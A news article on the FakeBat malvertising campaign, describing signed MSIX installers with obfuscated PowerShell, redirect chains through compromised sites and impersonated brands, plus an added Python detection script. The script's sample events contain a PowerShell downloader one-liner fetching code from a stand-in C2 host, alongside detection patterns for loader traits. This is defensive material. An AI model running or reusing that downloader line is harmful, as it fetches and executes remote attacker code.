Researchers see a surge in search-based malvertising campaigns: last month, the number of documented incidents nearly doubled.

Alongside familiar payloads, novel evasion tactics emerged, highlighting how quickly the online threat landscape is evolving. This is where the FakeBat malware enters the scene with its unusual approach to payload distribution.

Unveiling FakeBat: A Unique Malware Variant

Cybersecurity researchers discovered a malware family dubbed "FakeBat" that is distributed through malvertising campaigns. The threat actors used two kinds of ad URLs in their attacks.
(Photo: Clint Patterson from Unsplash)

One notable malware strain, FakeBat, garnered attention for its unconventional approach. According to Malwarebytes, the threat actors deliver it as MSIX installers that bundle heavily obfuscated PowerShell code, which runs when the victim launches what looks like a legitimate installer.

The malvertiser distributing FakeBat initially relied on predictable URL shorteners. More recent campaigns experimented with new redirectors, including legitimate websites abused to get past security checks.


Diversification in Campaign Targets

Unlike previous waves, which predominantly impersonated a handful of software brands, the latest FakeBat malvertising campaigns target a much wider range of brands. Defenders can no longer anticipate the lures from a short list of products.

Adaptive Redirection Strategies

Recent FakeBat malvertising campaigns used two redirection tactics in parallel. The traditional abuse of URL and analytics shorteners persisted, but the threat actors also routed victims through subdomains of compromised legitimate websites.

Because the first hop after the ad points at a domain with a clean reputation, these redirectors inherit the credibility of the compromised site and slip past reputation-based checks. Ad click-through URLs should therefore be judged by where the redirect chain ends, not by its first hop.

Active Brand Impersonations

Current campaigns impersonate various reputable brands, including OneNote, Epic Games, Ginger, and the Braavos smart wallet application. Many of the malicious domains are hosted on Russian infrastructure, which complicates takedown and mitigation.

Persistent Threats and Evolving Payloads

Each downloaded file is an MSIX installer signed with a valid digital certificate, posing as the impersonated brand's installer. A valid signature only proves that a certificate holder signed the package and that it has not been altered since; it says nothing about the signer's intent, so certificate validity alone is not a safety check. Upon execution, a standardized PowerShell script connects to the attacker's command and control server and registers the victim for later follow-on payloads.

Despite efforts to detect PowerShell execution, the threat actors keep bypassing security controls, so FakeBat remains a persistent threat to businesses.
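The PowerShell stage described above is the part of the chain most defenders can actually observe. The following Python script is an added example written for this article, not code from Malwarebytes or from the FakeBat operators: it scans constructed Sysmon-style process-creation events and flags PowerShell launched from inside an MSIX package folder under C:\Program Files\WindowsApps\ when the command line also carries loader-style traits (encoded command, hidden window, execution-policy bypass, remote fetch). The package folder name, the PsfLauncher64.exe parent, the C2 host and every log line are invented for the demo, and the trusted-package allowlist is a local tuning assumption.

```python
r"""Hunt for PowerShell spawned out of an MSIX package (added example, not from the report).

Assumptions, all constructed for this demo:
  * events are 'Key=Value|Key=Value' lines carrying Sysmon-style Image, ParentImage
    and CommandLine fields;
  * MSIX/Store packages are installed under C:\Program Files\WindowsApps\ (true on Windows);
  * the OneNote package folder, the PsfLauncher64.exe parent and the C2 host are
    invented to resemble the FakeBat pattern, not taken from real samples.
"""
import base64
import re
from typing import Optional

WINDOWS_APPS = "c:\\program files\\windowsapps\\"

# Packages that legitimately spawn PowerShell from WindowsApps (local tuning
# assumption; extend from your own telemetry). Matched on the package folder prefix.
TRUSTED_PACKAGE_PREFIXES = ("microsoft.windowsterminal",)

# Command-line traits that FakeBat-style loaders tend to combine.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)
REMOTE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|https?://", re.I)


def encode_ps(command: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_ps(blob: str) -> Optional[str]:
    """Inverse of encode_ps; None if the blob is not valid PowerShell base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_event(line: str) -> dict:
    """Split a constructed 'Key=Value|Key=Value' event into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def msix_package(parent_image: str) -> Optional[str]:
    """Return the WindowsApps package folder the parent runs from, else None."""
    lowered = parent_image.lower()
    if not lowered.startswith(WINDOWS_APPS):
        return None
    return lowered[len(WINDOWS_APPS):].split("\\", 1)[0]


def analyze(line: str) -> dict:
    """Score one process-creation event; returns alert flag, reasons and decoded command."""
    ev = parse_event(line)
    image_name = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    result = {"alert": False, "reasons": [], "decoded": None}
    if image_name not in ("powershell.exe", "pwsh.exe"):
        return result

    pkg = msix_package(ev.get("ParentImage", ""))
    from_untrusted_msix = pkg is not None and not pkg.startswith(TRUSTED_PACKAGE_PREFIXES)
    if from_untrusted_msix:
        result["reasons"].append(f"powershell spawned from MSIX package {pkg}")

    cmd = ev.get("CommandLine", "")
    m = ENCODED_RE.search(cmd)
    if m:
        result["decoded"] = decode_ps(m.group(1))
        result["reasons"].append("encoded command line")
    if HIDDEN_RE.search(cmd):
        result["reasons"].append("hidden window")
    if BYPASS_RE.search(cmd):
        result["reasons"].append("execution policy bypass")
    if REMOTE_RE.search(result["decoded"] or cmd):
        result["reasons"].append("fetches remote content")

    # Trusted packages spawn PowerShell all day and admins use encoded commands
    # legitimately, so alert only on an untrusted MSIX parent combined with at
    # least one loader-style command-line trait.
    cmdline_traits = len(result["reasons"]) - (1 if from_untrusted_msix else 0)
    result["alert"] = from_untrusted_msix and cmdline_traits > 0
    return result


def scan(events):
    return [analyze(e) for e in events]


# Constructed sample events (not real telemetry).
FAKEBAT_LIKE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    # 1: FakeBat-like: a PSF launcher inside a fake OneNote MSIX runs hidden, encoded PowerShell
    f"Image={PS}|ParentImage=C:\\Program Files\\WindowsApps\\OneNoteSetup_1.0.0.0_x64__abcdef123456\\PsfLauncher64.exe"
    f"|CommandLine=powershell.exe -ep bypass -w hidden -EncodedCommand {encode_ps(FAKEBAT_LIKE_CMD)}",
    # 2: Windows Terminal (itself an MSIX package) opening a PowerShell tab: benign
    f"Image={PS}|ParentImage=C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_1.18.0.0_x64__8wekyb3d8bbwe\\WindowsTerminal.exe"
    f"|CommandLine=powershell.exe -NoLogo",
    # 3: an admin's script launched from explorer.exe: benign
    f"Image={PS}|ParentImage=C:\\Windows\\explorer.exe|CommandLine=powershell.exe -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for res in scan(SAMPLE_EVENTS):
        print("ALERT" if res["alert"] else "ok   ", res["reasons"], res["decoded"])
```

The allowlist is what keeps this usable: Windows Terminal is itself an MSIX package and spawns powershell.exe constantly, so "PowerShell from WindowsApps" on its own would be noisy. The script therefore requires an untrusted package parent plus at least one command-line trait, and it decodes -EncodedCommand (base64 of UTF-16LE text) so the analyst sees the downloader one-liner rather than an opaque blob.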

Defense Strategies and Mitigation Efforts

Defending against search-based malvertising requires a multifaceted approach. Blocking the malicious payloads is essential, but the supporting infrastructure (ad accounts, redirectors, and compromised sites) changes too quickly for blocklists alone to keep up. Malwarebytes' ThreatDown EDR detects the PowerShell execution stage, but the dynamic nature of malvertising tactics remains a challenge.

Blocking ads at the network level, for example with a DNS filter such as ThreatDown DNS Filter, remains an effective countermeasure because it cuts the attack off at its first stage: the sponsored search result itself.

Malvertising Tactics Will Evolve For Years to Come

Search-based malvertising is expected to keep evolving in the coming years, which will push businesses to adopt stricter internal security policies.

Understanding how malware variants evolve and adapting defenses accordingly is paramount. By applying tested mitigation measures and collaborating with industry partners, organizations can better protect their digital assets against these threat actors.

In other news, Bumblebee malware created a new buzz around Valentine's Day with a new scheme. First discovered in 2022, it was believed by researchers to be the work of the Russia-based Conti ransomware gang.

ⓒ 2024 TECHTIMES.com All rights reserved. Do not reproduce without permission.